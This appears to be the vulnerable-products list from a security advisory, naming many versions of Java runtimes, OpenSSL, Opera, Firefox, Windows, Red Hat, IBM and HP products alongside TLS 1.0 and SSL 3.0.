Sun JDK (Linux Production Release) 1.5.0_26
Sun JDK (Linux Production Release) 1.5.0_25
Sun JDK (Linux Production Release) 1.5.0_24
Sun JDK (Linux Production Release) 1.5.0_23
Sun JDK (Linux Production Release) 1.5.0_20
Sun JDK (Linux Production Release) 1.5.0_16
Sun JDK (Linux Production Release) 1.5.0_13
Sun JDK (Linux Production Release) 1.5.0.0_12
Sun JDK (Linux Production Release) 1.5.0.0_11
Sun JDK (Linux Production Release) 1.5.0.0_09
Sun JDK (Linux Production Release) 1.5.0.0_08
Sun JDK (Linux Production Release) 1.5.0.0_04
Sun JDK (Linux Production Release) 1.5.0.0_03
Sun JDK (Linux Production Release) 1.5.0 Update25
Sun JDK (Linux Production Release) 1.5.0 Update24
Sun JDK (Linux Production Release) 1.5.0 Update23
Sun JDK (Linux Production Release) 1.5.0 Update22
Sun JDK (Linux Production Release) 1.5.0 Update21
Sun JDK (Linux Production Release) 1.5.0 Update20
Sun JDK (Linux Production Release) 1.5.0 Update19
Sun JDK (Linux Production Release) 1.5.0 Update18
Sun JDK (Linux Production Release) 1.5.0 Update17
Sun JDK (Linux Production Release) 1.5.0 Update16
Sun JDK (Linux Production Release) 1.5.0 Update15
Sun JDK (Linux Production Release) 1.5.0 Update14
Sun JDK (Linux Production Release) 1.5.0 Update13
Sun Java System Application Server 8.2
Sun Java System Application Server 8.1
Sun Glassfish Enterprise Server 2.1.1
Siemens SIMATIC RF68XR 3.2
Siemens SIMATIC RF68XR 3.1
Siemens SIMATIC RF615R 3.2
Siemens SIMATIC RF615R 3.1
Redhat Enterprise Linux WS Extras 4
Redhat Enterprise Linux Workstation Supplementary 6
Redhat Enterprise Linux Workstation Optional 6
Redhat Enterprise Linux Workstation 6
Redhat Enterprise Linux Supplementary 5 server
Redhat Enterprise Linux Server Supplementary 6
Redhat Enterprise Linux Server Optional 6
Redhat Enterprise Linux Server 6
Redhat Enterprise Linux SAP 6
Redhat Enterprise Linux HPC Node Supplementary 6
Redhat Enterprise Linux HPC Node Optional 6
Redhat Enterprise Linux HPC Node 6
Redhat Enterprise Linux for SAP 5 server
Redhat Enterprise Linux Extras 4
Redhat Enterprise Linux ES Extras 4
Redhat Enterprise Linux Desktop Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 5 client
Redhat Enterprise Linux Desktop Optional 6
Redhat Enterprise Linux Desktop 6
Redhat Enterprise Linux Desktop 5 client
Redhat Enterprise Linux AS for SAP 4
Redhat Enterprise Linux AS Extras 4
Redhat Enterprise Linux 5 Server
Redhat Desktop Extras 4
PeerSec Networks MatrixSSL 3.2.1
Oracle Solaris 11.1
Oracle Solaris 10
Oracle Oracle Fusion Middleware 11g Release 1 11.1.1 6
Oracle JRockit R28.1.4
Oracle JRockit R28.1.3
Oracle JRockit R28.1.1
Oracle JRockit R28.0.1
Oracle JRockit R28.0.0
Oracle JRockit R27.6.9
Oracle JRockit R27.6.8
Oracle JRockit R27.6.7
Oracle JRockit R27.6.6
Oracle JRockit R27.6.5
Oracle JRockit R27.6.4
Oracle JRockit R27.6.3
Oracle JRockit R27.6.2
Oracle JRockit R27.6.0-50 1.5.0 15
Oracle JRockit R27.6.0
Oracle JRockit R27.1.0
Oracle JRE (Windows Production Release) 1.6.0_27
Oracle JRE (Windows Production Release) 1.6.0_26
Oracle JRE (Windows Production Release) 1.6.0_25
Oracle JRE (Windows Production Release) 1.6.0_24
Oracle JRE (Windows Production Release) 1.6.0_23
Oracle JRE (Windows Production Release) 1.6.0_22
Oracle JRE (Solaris Production Release) 1.6.0_27
Oracle JRE (Solaris Production Release) 1.6.0_26
Oracle JRE (Solaris Production Release) 1.6.0_25
Oracle JRE (Solaris Production Release) 1.6.0_24
Oracle JRE (Solaris Production Release) 1.6.0_23
Oracle JRE (Solaris Production Release) 1.6.0_22
Oracle JRE (Linux Production Release) 1.6.0_27
Oracle JRE (Linux Production Release) 1.6.0_26
Oracle JRE (Linux Production Release) 1.6.0_25
Oracle JRE (Linux Production Release) 1.6.0_24
Oracle JRE (Linux Production Release) 1.6.0_23
Oracle JRE (Linux Production Release) 1.6.0_22
Oracle JDK (Windows Production Release) 1.7
Oracle JDK (Windows Production Release) 1.6.0_27
Oracle JDK (Windows Production Release) 1.6.0_26
Oracle JDK (Windows Production Release) 1.6.0_25
Oracle JDK (Windows Production Release) 1.6.0_24
Oracle JDK (Windows Production Release) 1.6.0_23
Oracle JDK (Windows Production Release) 1.6.0_22
Oracle JDK (Solaris Production Release) 1.7
Oracle JDK (Solaris Production Release) 1.6.0_27
Oracle JDK (Solaris Production Release) 1.6.0_26
Oracle JDK (Solaris Production Release) 1.6.0_25
Oracle JDK (Solaris Production Release) 1.6.0_24
Oracle JDK (Solaris Production Release) 1.6.0_23
Oracle JDK (Solaris Production Release) 1.6.0_22
Oracle JDK (Linux Production Release) 1.7
Oracle JDK (Linux Production Release) 1.6.0_27
Oracle JDK (Linux Production Release) 1.6.0_26
Oracle JDK (Linux Production Release) 1.6.0_25
Oracle JDK (Linux Production Release) 1.6.0_24
Oracle JDK (Linux Production Release) 1.6.0_23
Oracle JDK (Linux Production Release) 1.6.0_22
Oracle HTTP Server 12c 12.1.2
Oracle Fusion Middleware 11g Release 1 11.1.1 7
Oracle Fusion Middleware 12.1.3.0.0
Oracle Forms and Reports 11g Release 2 11.1.2.1
Oracle Enterprise Linux 6
Oracle Enterprise Linux 5
Oracle Database 11g Release 2 11.2.0.3
Oracle Database 11g Release 2 11.2.0.2
Oracle Database 11g Release 1 11.1.0.7
Opera Software Opera Web Browser 8.51
Opera Software Opera Web Browser 8.50
Opera Software Opera Web Browser 8.0.2
Opera Software Opera Web Browser 8.0 2
Opera Software Opera Web Browser 8.0 1
Opera Software Opera Web Browser 8.0
Opera Software Opera Web Browser 7.54
Opera Software Opera Web Browser 7.53
Opera Software Opera Web Browser 7.52
Opera Software Opera Web Browser 7.51
Opera Software Opera Web Browser 7.50
Opera Software Opera Web Browser 7.23
Opera Software Opera Web Browser 7.22
Opera Software Opera Web Browser 7.21
Opera Software Opera Web Browser 7.20 Beta 1 build 2981
Opera Software Opera Web Browser 7.20
Opera Software Opera Web Browser 7.11 j
Opera Software Opera Web Browser 7.11 b
Opera Software Opera Web Browser 7.11
Opera Software Opera Web Browser 7.10
Opera Software Opera Web Browser 7.0 win32 Beta 2
Opera Software Opera Web Browser 7.0 win32 Beta 1
Opera Software Opera Web Browser 7.0 win32
Opera Software Opera Web Browser 7.0 3win32
Opera Software Opera Web Browser 7.0 2win32
Opera Software Opera Web Browser 7.0 1win32
Opera Software Opera Web Browser 6.10 linux
Opera Software Opera Web Browser 6.0.5 win32
Opera Software Opera Web Browser 6.0.4 win32
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
Opera Software Opera Web Browser 6.0.2 win32
Opera Software Opera Web Browser 6.0.2 linux
Opera Software Opera Web Browser 6.0.1 win32
Opera Software Opera Web Browser 6.0.1 linux
Opera Software Opera Web Browser 6.0.1
Opera Software Opera Web Browser 6.0 win32
Opera Software Opera Web Browser 6.0 6
Opera Software Opera Web Browser 6.0 .6win32
Opera Software Opera Web Browser 6.0
Opera Software Opera Web Browser 5.12 win32
Opera Software Opera Web Browser 5.12
Opera Software Opera Web Browser 5.1 1 win32
Opera Software Opera Web Browser 5.1 0 win32
Opera Software Opera Web Browser 5.0 Linux
Opera Software Opera Web Browser 5.0 2 win32
Opera Software Opera Web Browser 5.0 Mac
Opera Software Opera Web Browser 9.64
Opera Software Opera Web Browser 9.63
Opera Software Opera Web Browser 9.62
Opera Software Opera Web Browser 9.61
Opera Software Opera Web Browser 9.60 beta 1
Opera Software Opera Web Browser 9.60
Opera Software Opera Web Browser 9.52
Opera Software Opera Web Browser 9.51
Opera Software Opera Web Browser 9.50 beta
Opera Software Opera Web Browser 9.5
Opera Software Opera Web Browser 9.27
Opera Software Opera Web Browser 9.26
Opera Software Opera Web Browser 9.25
Opera Software Opera Web Browser 9.24
Opera Software Opera Web Browser 9.23
Opera Software Opera Web Browser 9.22
Opera Software Opera Web Browser 9.21
Opera Software Opera Web Browser 9.20 beta 1
Opera Software Opera Web Browser 9.20
Opera Software Opera Web Browser 9.10
Opera Software Opera Web Browser 9.02
Opera Software Opera Web Browser 9.01
Opera Software Opera Web Browser 9
Opera Software Opera Web Browser 8.54
Opera Software Opera Web Browser 8.53
Opera Software Opera Web Browser 8.52
Opera Software Opera Web Browser 8 Beta 3
Opera Software Opera Web Browser 11.50
Opera Software Opera Web Browser 11.11
Opera Software Opera Web Browser 11.10
Opera Software Opera Web Browser 11.01
Opera Software Opera Web Browser 11.00
Opera Software Opera Web Browser 10.63
Opera Software Opera Web Browser 10.62
Opera Software Opera Web Browser 10.61
Opera Software Opera Web Browser 10.60 Beta1
Opera Software Opera Web Browser 10.60
Opera Software Opera Web Browser 10.54
Opera Software Opera Web Browser 10.53 B
Opera Software Opera Web Browser 10.53
Opera Software Opera Web Browser 10.52
Opera Software Opera Web Browser 10.51
Opera Software Opera Web Browser 10.50 Beta2
Opera Software Opera Web Browser 10.50 Beta1
Opera Software Opera Web Browser 10.50
Opera Software Opera Web Browser 10.10 Beta1
Opera Software Opera Web Browser 10.10
Opera Software Opera Web Browser 10.1
Opera Software Opera Web Browser 10.01
Opera Software Opera Web Browser 10.00 Beta3
Opera Software Opera Web Browser 10.00 Beta2
Opera Software Opera Web Browser 10.00 Beta1
Opera Software Opera Web Browser 10.00
Opera Software Opera Web Browser 10
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0 beta3
OpenSSL Project OpenSSL 1.0 Beta2
OpenSSL Project OpenSSL 1.0 beta1
OpenSSL Project OpenSSL 1.0
OpenSSL Project OpenSSL 0.9.8 k
OpenSSL Project OpenSSL 0.9.8 j
OpenSSL Project OpenSSL 0.9.8 i
OpenSSL Project OpenSSL 0.9.8 h
OpenSSL Project OpenSSL 0.9.8 e
OpenSSL Project OpenSSL 0.9.8 d
OpenSSL Project OpenSSL 0.9.8 c
OpenSSL Project OpenSSL 0.9.8 b
OpenSSL Project OpenSSL 0.9.8 a
OpenSSL Project OpenSSL 0.9.8
OpenSSL Project OpenSSL 0.9.7 m
OpenSSL Project OpenSSL 0.9.7 l
OpenSSL Project OpenSSL 0.9.7 k
OpenSSL Project OpenSSL 0.9.7 j
OpenSSL Project OpenSSL 0.9.7 i
OpenSSL Project OpenSSL 0.9.7 h
OpenSSL Project OpenSSL 0.9.7 g
OpenSSL Project OpenSSL 0.9.7 f
OpenSSL Project OpenSSL 0.9.7 e
OpenSSL Project OpenSSL 0.9.7 d
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
OpenSSL Project OpenSSL 0.9.7
OpenSSL Project OpenSSL 0.9.6 m
OpenSSL Project OpenSSL 0.9.6 l
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.6 b-36.8
OpenSSL Project OpenSSL 0.9.6 b
OpenSSL Project OpenSSL 0.9.6 a
OpenSSL Project OpenSSL 0.9.6
OpenSSL Project OpenSSL 0.9.5 a
OpenSSL Project OpenSSL 0.9.5
OpenSSL Project OpenSSL 0.9.4
OpenSSL Project OpenSSL 0.9.3
OpenSSL Project OpenSSL 0.9.2 b
OpenSSL Project OpenSSL 0.9.1 c
OpenSSL Project OpenSSL 1.0.0e
OpenSSL Project OpenSSL 1.0.0d
OpenSSL Project OpenSSL 1.0.0c
OpenSSL Project OpenSSL 1.0.0b
OpenSSL Project OpenSSL 1.0.0A
OpenSSL Project OpenSSL 1.0.0a
OpenSSL Project OpenSSL 1.0.0 Beta5
OpenSSL Project OpenSSL 1.0.0 Beta4
OpenSSL Project OpenSSL 0.9.8s
OpenSSL Project OpenSSL 0.9.8R
OpenSSL Project OpenSSL 0.9.8Q
OpenSSL Project OpenSSL 0.9.8p
OpenSSL Project OpenSSL 0.9.8O
OpenSSL Project OpenSSL 0.9.8o
OpenSSL Project OpenSSL 0.9.8n
OpenSSL Project OpenSSL 0.9.8N
OpenSSL Project OpenSSL 0.9.8M
OpenSSL Project OpenSSL 0.9.8m
OpenSSL Project OpenSSL 0.9.8l
OpenSSL Project OpenSSL 0.9.8g
OpenSSL Project OpenSSL 0.9.8f
OpenSSL Project OpenSSL 0.9.8 f
OpenJDK OpenJDK 1.6
OpenJDK OpenJDK 6
Novell Access Manager 3.1 SP3
Novell Access Manager 3.1 SP2
Novell Access Manager 3.1 SP1
Novell Access Manager 3.1
Mozilla Firefox 3.6.13
Mozilla Firefox 3.6.10
Mozilla Firefox 3.6.9
Mozilla Firefox 3.6.8
Mozilla Firefox 3.6.6
Mozilla Firefox 3.6.4
Mozilla Firefox 3.6.3
Mozilla Firefox 3.6.2
Mozilla Firefox 6
Mozilla Firefox 5.0
Mozilla Firefox 4.0.1
Mozilla Firefox 4.0 Beta1
Mozilla Firefox 4.0
Mozilla Firefox 3.6.7
Mozilla Firefox 3.6.20
Mozilla Firefox 3.6.19
Mozilla Firefox 3.6.18
Mozilla Firefox 3.6.17
Mozilla Firefox 3.6.16
Mozilla Firefox 3.6.15
Mozilla Firefox 3.6.14
Mozilla Firefox 3.6.12
Mozilla Firefox 3.6.11
Mozilla Firefox 3.6 Beta 3
Mozilla Firefox 3.6 Beta 2
Mozilla Firefox 3.6
Microsoft Windows XP Tablet PC Edition SP3
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional x64 Edition SP3
Microsoft Windows XP Professional x64 Edition SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition 2005 SP3
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP3
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP3
Microsoft Windows XP Embedded SP2
Microsoft Windows XP 0
Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition Sp2 X64
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition Sp1 X64
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition X86-Ultimate
Microsoft Windows Vista Business 64-bit edition X86-Enterprise
Microsoft Windows Vista Business 64-bit edition X64-Ultimate
Microsoft Windows Vista Business 64-bit edition X64-Enterprise
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition Sp1 X86-Ultimate
Microsoft Windows Vista Business 64-bit edition Sp1 X86-Enterprise
Microsoft Windows Vista Business 64-bit edition Sp1 X64-Ultimate
Microsoft Windows Vista Business 64-bit edition Sp1 X64-Home Premium
Microsoft Windows Vista Business 64-bit edition Sp1 X64-Enterprise
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows Server 2008 Standard Edition X64
Microsoft Windows Server 2008 Standard Edition SP2
Microsoft Windows Server 2008 Standard Edition Release Candidate
Microsoft Windows Server 2008 Standard Edition R2 SP1
Microsoft Windows Server 2008 Standard Edition R2
Microsoft Windows Server 2008 Standard Edition Itanium
Microsoft Windows Server 2008 Standard Edition 0
Microsoft Windows Server 2008 Standard Edition - Sp2 Web
Microsoft Windows Server 2008 Standard Edition - Sp2 Storage
Microsoft Windows Server 2008 Standard Edition - Sp2 Hpc
Microsoft Windows Server 2008 Standard Edition - Gold Web
Microsoft Windows Server 2008 Standard Edition - Gold Storage
Microsoft Windows Server 2008 Standard Edition - Gold Standard
Microsoft Windows Server 2008 Standard Edition - Gold Itanium
Microsoft Windows Server 2008 Standard Edition - Gold Hpc
Microsoft Windows Server 2008 Standard Edition - Gold Enterprise
Microsoft Windows Server 2008 Standard Edition - Gold Datacenter
Microsoft Windows Server 2008 Standard Edition - Gold
Microsoft Windows Server 2008 R2 x64 SP1
Microsoft Windows Server 2008 R2 x64 0
Microsoft Windows Server 2008 R2 Standard Edition 0
Microsoft Windows Server 2008 R2 Itanium SP1
Microsoft Windows Server 2008 R2 Itanium 0
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 R2 Enterprise Edition 0
Microsoft Windows Server 2008 R2 Datacenter SP1
Microsoft Windows Server 2008 R2 Datacenter 0
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems R2
Microsoft Windows Server 2008 for x64-based Systems 0
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems R2
Microsoft Windows Server 2008 for Itanium-based Systems 0
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems 0
Microsoft Windows Server 2008 Enterprise Edition SP2
Microsoft Windows Server 2008 Enterprise Edition Release Candidate
Microsoft Windows Server 2008 Enterprise Edition 0
Microsoft Windows Server 2008 Datacenter Edition SP2
Microsoft Windows Server 2008 Datacenter Edition Release Candidate
Microsoft Windows Server 2008 Datacenter Edition 0
Microsoft Windows Server 2008 SP2 Beta
Microsoft Windows Server 2008 R2 SP1
Microsoft Windows Server 2008 - Sp2 Enterprise X64
Microsoft Windows Server 2003 x64 SP2
Microsoft Windows Server 2003 x64 SP1
Microsoft Windows Server 2003 Web Edition SP2
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Terminal Services 0
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP2
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 R2 web Edition 0
Microsoft Windows Server 2003 R2 Standard Edition 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP2 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP1 0
Microsoft Windows Server 2003 R2 Enterprise Edition 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP2 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP1 0
Microsoft Windows Server 2003 R2 Datacenter Edition 0
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Itanium 0
Microsoft Windows Server 2003 Enterprise x64 Edition SP2
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium Sp2 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium SP2
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition SP2
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Sp2 X64
Microsoft Windows Server 2003 Sp2 Storage
Microsoft Windows Server 2003 Sp2 Enterprise
Microsoft Windows Server 2003 Sp2 Datacenter
Microsoft Windows Server 2003 Sp2 Compute Cluster
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 Sp1 X64
Microsoft Windows Server 2003 Sp1 Storage
Microsoft Windows Server 2003 SP1 Platform SDK
Microsoft Windows Server 2003 Sp1 Compute Cluster
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003 R2 X64-Standard
Microsoft Windows Server 2003 R2 X64-Enterprise
Microsoft Windows Server 2003 R2 X64-Datacenter
Microsoft Windows Server 2003 R2 X64
Microsoft Windows Server 2003 R2 Storage
Microsoft Windows Server 2003 R2 Standard
Microsoft Windows Server 2003 R2 Platform SDK
Microsoft Windows Server 2003 R2 Enterprise
Microsoft Windows Server 2003 R2 Datacenter
Microsoft Windows Server 2003 R2 Compute Cluster
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 Gold X64-Standard
Microsoft Windows Server 2003 Gold X64-Enterprise
Microsoft Windows Server 2003 Gold X64-Datacenter
Microsoft Windows Server 2003 Gold X64
Microsoft Windows Server 2003 Gold Storage
Microsoft Windows Server 2003 Gold Standard
Microsoft Windows Server 2003 Gold Itanium
Microsoft Windows Server 2003 Gold Enterprise
Microsoft Windows Server 2003 Gold Datacenter
Microsoft Windows Server 2003 Gold Compute Cluster
Microsoft Windows Server 2003 Gold
Microsoft Windows Server 2008 R2
Microsoft Windows 7 XP Mode 0
Microsoft Windows 7 Ultimate 0
Microsoft Windows 7 Starter 0
Microsoft Windows 7 Professional 0
Microsoft Windows 7 Home Premium 0
Microsoft Windows 7 Home Premium - Sp1 X64
Microsoft Windows 7 Home Premium - Sp1 X32
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems SP1
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 RC
Mandriva Linux Mandrake 2011 x86_64
Mandriva Linux Mandrake 2011
Mandriva Linux Mandrake 2010.1 x86_64
Mandriva Linux Mandrake 2010.1
Mandriva Business Server 1 X86 64
Mandriva Business Server 1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Kerio Kerio Control 7.1.0 Patch 1
Kerio Kerio Control 7.1.0
Kerio Kerio Connect 7.1.4 build 2985
IETF TLS 1.0
IETF Secure Sockets Layer (SSL) 3.0
IBM WebSphere Multichannel Bank Transformation Toolkit 8.1.0.2
IBM WebSphere Multichannel Bank Transformation Toolkit 8.1
IBM WebSphere Multichannel Bank Transformation Toolkit 8.0.1
IBM WebSphere Multichannel Bank Transformation Toolkit 8.0
IBM WebSphere DataPower SOA Appliance Firmware 4.0.2
IBM WebSphere DataPower SOA Appliance Firmware 4.0.1
IBM WebSphere DataPower SOA Appliance Firmware 3.8.2
IBM WebSphere DataPower SOA Appliance Firmware 3.8.1
IBM WebSphere DataPower SOA Appliance Firmware 4.0
IBM WebSphere DataPower SOA Appliance Firmware 3.8
IBM System x Integrated Management Module (IMM2) 2
IBM System Networking Ethernet Switch 0
IBM Rational Policy Tester 8.5.0.1
IBM Rational Policy Tester 8.5
IBM Rational Policy Tester 8.0
IBM Rational AppScan Standard 8.5.0.1
IBM Rational AppScan Standard 8.0.0.3
IBM Rational AppScan Standard 8.0.0
IBM Rational AppScan Standard 7.8
IBM Rational AppScan Enterprise 8.6
IBM Rational AppScan Enterprise 8.5.0.1
IBM Rational AppScan Enterprise 8.0.1.1
IBM Rational AppScan Enterprise 8.0.1
IBM Rational AppScan Enterprise 8.0.0.1
IBM Rational AppScan Enterprise 8.0.0
IBM Power Systems 773.10
IBM Power Systems 773.02
IBM Power Systems 773.00
IBM Power Systems 770.31
IBM Power Systems 770.22
IBM Power Systems 770.21
IBM Power Systems 770.20
IBM Power Systems 770.10
IBM Power Systems 770.00
IBM Power Systems 760.41
IBM Power Systems 760.40
IBM Power Systems 760.31
IBM Power Systems 760.30
IBM Power Systems 760.20
IBM Power Systems 760.11
IBM Power Systems 760.10
IBM Power Systems 760.00
IBM Power Systems 740.81
IBM Power Systems 740.80
IBM Power Systems 740.70
IBM Power Systems 740.61
IBM Power Systems 740.60
IBM Power Systems 740.52
IBM Power Systems 740.51
IBM Power Systems 740.50
IBM Power Systems 740.40
IBM Power Systems 740.21
IBM Power Systems 740.20
IBM Power Systems 740.16
IBM Power Systems 740.15
IBM Power Systems 740.10
IBM Power Systems 740.00
IBM Power Systems 730.91
IBM Power Systems 730.90
IBM Power Systems 730.80
IBM Power Systems 730.72
IBM Power Systems 730.71
IBM Power Systems 730.70
IBM Power Systems 730.61
IBM Power Systems 730.60
IBM Power Systems 730.51
IBM Power Systems 730.50
IBM Power Systems 730.46
IBM Power Systems 730.45
IBM Power Systems 730.40
IBM Power Systems 730.30
IBM Power Systems 730.20
IBM Power Systems 730.00
IBM Power Systems 350.D0
IBM Power Systems 350.C0
IBM Power Systems 350.B1
IBM Power Systems 350.B0
IBM Power Systems 350.A0
IBM Power Systems 350.90
IBM Power Systems 350.80
IBM Power Systems 350.70
IBM Power Systems 350.60
IBM Power Systems 350.50
IBM Power Systems 350.40
IBM Power Systems 350.30
IBM Power Systems 350.20
IBM Power Systems 350.10
IBM Power Systems 350.00
IBM OpenPages GRC Platform 5.5.3
IBM OpenPages GRC Platform 5.5.2
IBM OpenPages GRC Platform 5.5
IBM OpenPages GRC Platform 5.1
IBM OpenPages GRC Platform 5.0
IBM Lotus Domino 8.5.3
IBM Lotus Domino 8.5.2
IBM Lotus Domino 8.5.1
IBM Lotus Domino 8.5
IBM Lotus Domino 8.0
IBM Java SE 1.4.2
IBM Java SE 7.0
IBM Java SE 7
IBM Java SE 6.0.0 SR9-FP2
IBM Java SE 6.0.0 SR9
IBM Java SE 6.0 SR7
IBM Java SE 6.0 SR6
IBM Java SE 6.0 SR5
IBM Java SE 6.0
IBM Java SE 6 SR8 FP1
IBM Java SE 6
IBM Java SE 5.0.0 SR12
IBM Java SE 5.0 SR12-FP5
IBM Java SE 5.0 SR11 PF1
IBM Java SE 5.0 SR11
IBM Java SE 5.0 SR10
IBM Java SE 5.0
IBM Java SE 1.4.2 SR13-FP10
IBM Java SDK 1.4.2
IBM Java SDK 6
IBM JAVA IBM 31-bit SDK for z/OS 5.0
IBM Flex System Manager 0
IBM Flex System Integrated Management Module (IMM2) 2
IBM Flex System IMM2 2.00
IBM Flex System IMM2 1.00
IBM Flex System CMM 1.40.2Q
IBM Flex System CMM 1.00
IBM Flex System Chassis Management Module (CMM) 0
IBM BladeCenter Advanced Management Module (AMM) 0
HP System Management Homepage 7.2
HP System Management Homepage 7.1.2
HP System Management Homepage 7.1.1
HP System Management Homepage 6.0 .96
HP System Management Homepage 3.0.2 .77
HP System Management Homepage 3.0.1 .73
HP System Management Homepage 3.0 .68
HP System Management Homepage 3.0 .64
HP System Management Homepage 2.2.9 .1
HP System Management Homepage 2.2.8
HP System Management Homepage 2.2.6
HP System Management Homepage 2.1.15 210
HP System Management Homepage 2.1.12
HP System Management Homepage 2.1.11
HP System Management Homepage 2.1.10
HP System Management Homepage 2.1.9
HP System Management Homepage 2.1.8
HP System Management Homepage 2.1.7
HP System Management Homepage 2.1.6
HP System Management Homepage 2.1.5
HP System Management Homepage 2.1.4
HP System Management Homepage 2.1.3 .132
HP System Management Homepage 2.1.3
HP System Management Homepage 2.1.2
HP System Management Homepage 2.1.1
HP System Management Homepage 2.1
HP System Management Homepage 2.0.2
HP System Management Homepage 2.0.1
HP System Management Homepage 2.0
HP System Management Homepage 7.1
HP System Management Homepage 7.0
HP System Management Homepage 6.3
HP System Management Homepage 6.2.0-12
HP System Management Homepage 6.2
HP System Management Homepage 6.1.0.103
HP System Management Homepage 6.1.0.102
HP System Management Homepage 6.1.0-103
HP System Management Homepage 6.1
HP System Management Homepage 6.0.0.95
HP System Management Homepage 6.0.0-95
HP System Management Homepage 6.0
HP System Management Homepage 3.0.2.77 B
HP System Management Homepage 3.0.2-77
HP System Management Homepage 3.0.1-73
HP System Management Homepage 3.0.0-68
